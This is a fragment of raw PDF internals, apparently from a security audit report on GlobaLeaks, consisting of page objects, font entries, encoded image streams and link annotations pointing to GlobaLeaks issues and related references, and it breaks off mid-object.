N)V?2oSS'`L3>Ao@#/FDu]l-Vr7UUq.M_f5X$(r!0E7r!s%DWi;`lRBK,uW4rOn2OH5+u!9Bp6!!)h":r=`2h[0@VEMGI_4V88<OU<j]_Z9b9T8!FJjJ1Z6!;U:f!'i^d%KMTOL'%G:UYu1Qq.M_f5X$(r!0E7r!s%ERVhP9R0PS9[SFu[u2L!@@r8(F8D_<4X+u6f+FB<LoL3'q0%^F\e[q>\kJ(<)+;/1rB!s$h9_Z9c.)85"1a7u%l=Si+!RPeP+&J5Tead4)8b?(&~>endstream
endobj
% 'FormXob.109b1ed966e89c0d2b712244fe23e81a': class PDFImageXObject 
160 0 obj
<< /BitsPerComponent 8
 /ColorSpace /DeviceGray
 /Decode [ 0
 1 ]
 /Filter [ /ASCII85Decode
 /FlateDecode ]
 /Height 525
 /Length 132
 /Subtype /Image
 /Type /XObject
 /Width 758 >>
stream
Gb"0;0`_7S!5bE.WFlSlTE"rlzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz!!(qoBJ7@a~>endstream
endobj
% 'Annot.NUMBER138': class PDFDictionary 
161 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://docs.google.com/a/leastauthority.com/document/d/1SMSiAry7x5XY9nY8GAejJD75NWg7bp7M1PwXSiwy62U/pub) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 139.3314
 357.7736
 375.9585
 369.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER139': class PDFDictionary 
162 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 452.1188
 264.7736
 531.5988
 276.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER140': class PDFDictionary 
163 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 85.69291
 252.7736
 102.3729
 264.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER141': class PDFDictionary 
164 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 171.2929
 252.7736
 389.1429
 264.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER142': class PDFDictionary 
165 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 85.69291
 222.7736
 192.1256
 234.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER143': class PDFDictionary 
166 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 210.9265
 222.7736
 439.4109
 234.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER144': class PDFDictionary 
167 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/822) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 189.6129
 192.7736
 324.1229
 204.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page12': class PDFPage 
168 0 obj
% Page dictionary
<< /Annots [ 161 0 R
 162 0 R
 163 0 R
 164 0 R
 165 0 R
 166 0 R
 167 0 R ]
 /Contents 354 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ]
 /XObject << /FormXob.50a88798ae89ee7ab040ed56b8555632 159 0 R >> >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER145': class LinkAnnotation 
169 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 278 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 62.69291
 396.7736
 387.6228
 408.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page13': class PDFPage 
170 0 obj
% Page dictionary
<< /Annots [ 169 0 R ]
 /Contents 355 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER146': class PDFDictionary 
171 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/823) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 241.6629
 507.7736
 376.1729
 519.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER147': class PDFDictionary 
172 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/823) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 189.6129
 456.7736
 324.1229
 468.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page14': class PDFPage 
173 0 obj
% Page dictionary
<< /Annots [ 171 0 R
 172 0 R ]
 /Contents 356 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER148': class PDFDictionary 
174 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/672) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 408.8427
 186.7736
 511.3427
 198.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER149': class PDFDictionary 
175 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/824) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 189.6129
 141.7736
 324.1229
 153.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page15': class PDFPage 
176 0 obj
% Page dictionary
<< /Annots [ 174 0 R
 175 0 R ]
 /Contents 357 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER150': class PDFDictionary 
177 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 310.3728
 333.7736
 412.6927
 345.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER151': class PDFDictionary 
178 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 424.5627
 333.7736
 532.3827
 345.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER152': class PDFDictionary 
179 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 85.69291
 321.7736
 195.7229
 333.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER153': class PDFDictionary 
180 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/825) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 189.6129
 303.7736
 324.1229
 315.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page16': class PDFPage 
181 0 obj
% Page dictionary
<< /Annots [ 177 0 R
 178 0 R
 179 0 R
 180 0 R ]
 /Contents 358 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER154': class LinkAnnotation 
182 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 239 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 456.6714
 702.7736
 531.032
 714.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER155': class LinkAnnotation 
183 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 239 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 62.69291
 690.7736
 198.4057
 702.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER156': class LinkAnnotation 
184 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 397.5106
 690.7736
 532.2463
 702.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER157': class LinkAnnotation 
185 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 62.69291
 678.7736
 283.8929
 690.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'F6': class PDFType1Font 
186 0 obj
% Font Courier-Bold
<< /BaseFont /Courier-Bold
 /Encoding /WinAnsiEncoding
 /Name /F6
 /Subtype /Type1
 /Type /Font >>
endobj
% 'F7': class PDFType1Font 
187 0 obj
% Font Courier-Oblique
<< /BaseFont /Courier-Oblique
 /Encoding /WinAnsiEncoding
 /Name /F7
 /Subtype /Type1
 /Type /Font >>
endobj
% 'Page17': class PDFPage 
188 0 obj
% Page dictionary
<< /Annots [ 182 0 R
 183 0 R
 184 0 R
 185 0 R ]
 /Contents 359 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER158': class LinkAnnotation 
189 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 293.8244
 558.5736
 530.0404
 570.5736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER159': class LinkAnnotation 
190 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 62.69291
 546.5736
 206.7156
 558.5736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER160': class LinkAnnotation 
191 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 239 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 227.8665
 546.5736
 446.9509
 558.5736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER161': class PDFDictionary 
192 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/826) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 189.6129
 387.5736
 324.1229
 399.5736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page18': class PDFPage 
193 0 obj
% Page dictionary
<< /Annots [ 189 0 R
 190 0 R
 191 0 R
 192 0 R ]
 /Contents 360 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'F8': class PDFType1Font 
194 0 obj
% Font Courier-BoldOblique
<< /BaseFont /Courier-BoldOblique
 /Encoding /WinAnsiEncoding
 /Name /F8
 /Subtype /Type1
 /Type /Font >>
endobj
% 'Page19': class PDFPage 
195 0 obj
% Page dictionary
<< /Contents 361 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER162': class PDFDictionary 
196 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://stackoverflow.com/a/1365186) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 517.0227
 537.7736
 528.7598
 549.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER163': class PDFDictionary 
197 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://stackoverflow.com/a/1365186) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 62.69291
 525.7736
 162.1629
 537.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER164': class PDFDictionary 
198 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/832) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 189.6129
 486.7736
 324.1229
 498.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page20': class PDFPage 
199 0 obj
% Page dictionary
<< /Annots [ 196 0 R
 197 0 R
 198 0 R ]
 /Contents 362 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Page21': class PDFPage 
200 0 obj
% Page dictionary
<< /Contents 363 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ]
 /XObject << /FormXob.3504796935e9b1b0d34a034172872e63 151 0 R >> >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER165': class LinkAnnotation 
201 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 153 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 157.47
 645.7736
 416.7813
 657.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER166': class PDFDictionary 
202 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 285.2313
 492.7736
 387.787
 504.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER167': class PDFDictionary 
203 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 424.4841
 492.7736
 532.3041
 504.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER168': class PDFDictionary 
204 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 85.69291
 480.7736
 195.7229
 492.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER169': class PDFDictionary 
205 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/828) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 189.6129
 301.5736
 324.1229
 313.5736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page22': class PDFPage 
206 0 obj
% Page dictionary
<< /Annots [ 201 0 R
 202 0 R
 203 0 R
 204 0 R
 205 0 R ]
 /Contents 364 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER170': class LinkAnnotation 
207 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 454.1929
 642.7736
 509.2029
 654.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER171': class PDFDictionary 
208 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://tahoe-lafs.org/trac/tahoe-lafs/browser/trunk/src/allmydata/util/encodingutil.py#L192) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 368.6872
 185.8978
 436.196
 197.8978 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page23': class PDFPage 
209 0 obj
% Page dictionary
<< /Annots [ 207 0 R
 208 0 R ]
 /Contents 365 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER172': class PDFDictionary 
210 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/829) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 189.6129
 368.4076
 324.1229
 380.4076 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page24': class PDFPage 
211 0 obj
% Page dictionary
<< /Annots [ 210 0 R ]
 /Contents 366 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER173': class LinkAnnotation 
212 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 276 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 85.04206
 537.7736
 326.4961
 549.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER174': class PDFDictionary 
213 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://abortz.net/papers/timingweb.pdf) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 330.0261
 465.7736
 531.5294
 477.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER175': class PDFDictionary 
214 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://abortz.net/papers/timingweb.pdf) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 62.69291
 453.7736
 116.6029
 465.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER176': class PDFDictionary 
215 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://tahoe-lafs.org/trac/tahoe-lafs/browser/trunk/src/allmydata/util/hashutil.py?annotate=blame&rev=a4a6c02ef8ae2e0edb30bb0051873ffca6af6fc0#L205) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 62.69291
 297.7736
 119.3829
 309.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page25': class PDFPage 
216 0 obj
% Page dictionary
<< /Annots [ 212 0 R
 213 0 R
 214 0 R
 215 0 R ]
 /Contents 367 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER177': class LinkAnnotation 
217 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 182.3675
 678.7736
 529.7412
 690.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER178': class LinkAnnotation 
218 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 62.69291
 666.7736
 95.48291
 678.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER179': class LinkAnnotation 
219 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 253.3029
 427.5736
 308.3129
 439.5736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page26': class PDFPage 
220 0 obj
% Page dictionary
<< /Annots [ 217 0 R
 218 0 R
 219 0 R ]
 /Contents 368 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER180': class LinkAnnotation 
221 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 182.3675
 678.7736
 529.7412
 690.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER181': class LinkAnnotation 
222 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 62.69291
 666.7736
 95.48291
 678.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER182': class LinkAnnotation 
223 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 253.3029
 453.5762
 308.3129
 465.5762 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page27': class PDFPage 
224 0 obj
% Page dictionary
<< /Annots [ 221 0 R
 222 0 R
 223 0 R ]
 /Contents 369 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER183': class LinkAnnotation 
225 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 182.3675
 678.7736
 529.7412
 690.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER184': class LinkAnnotation 
226 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 62.69291
 666.7736
 95.48291
 678.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page28': class PDFPage 
227 0 obj
% Page dictionary
<< /Annots [ 225 0 R
 226 0 R ]
 /Contents 370 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER185': class LinkAnnotation 
228 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 253.3029
 355.5736
 308.3129
 367.5736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page29': class PDFPage 
229 0 obj
% Page dictionary
<< /Annots [ 228 0 R ]
 /Contents 371 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER186': class LinkAnnotation 
230 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 182.3675
 666.7736
 529.7412
 678.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER187': class LinkAnnotation 
231 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 62.69291
 654.7736
 95.48291
 666.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER188': class LinkAnnotation 
232 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 253.3029
 229.7777
 308.3129
 241.7777 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER189': class LinkAnnotation 
233 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 276 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 101.96
 211.7777
 349.1399
 223.7777 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page30': class PDFPage 
234 0 obj
% Page dictionary
<< /Annots [ 230 0 R
 231 0 R
 232 0 R
 233 0 R ]
 /Contents 372 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER190': class LinkAnnotation 
235 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 458.4027
 648.7736
 532.4527
 660.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER191': class LinkAnnotation 
236 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 767.5236
 0 ]
 /Rect [ 62.69291
 636.7736
 343.3629
 648.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER192': class LinkAnnotation 
237 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 768.5236
 0 ]
 /Rect [ 253.3029
 502.5798
 308.3129
 514.5798 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page31': class PDFPage 
238 0 obj
% Page dictionary
<< /Annots [ 235 0 R
 236 0 R
 237 0 R ]
 /Contents 373 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Page32': class PDFPage 
239 0 obj
% Page dictionary
<< /Contents 374 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER193': class PDFDictionary 
240 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (https://github.com/globaleaks/GlobaLeaks/issues/831) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 189.6129
 654.7736
 324.1229
 666.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page33': class PDFPage 
241 0 obj
% Page dictionary
<< /Annots [ 240 0 R ]
 /Contents 375 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER194': class PDFDictionary 
242 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (http://en.wikipedia.org/wiki/Principle_of_least_privilege) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 495.3527
 645.7736
 532.1827
 657.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER195': class PDFDictionary 
243 0 obj
<< /A << /S /URI
 /Type /Action
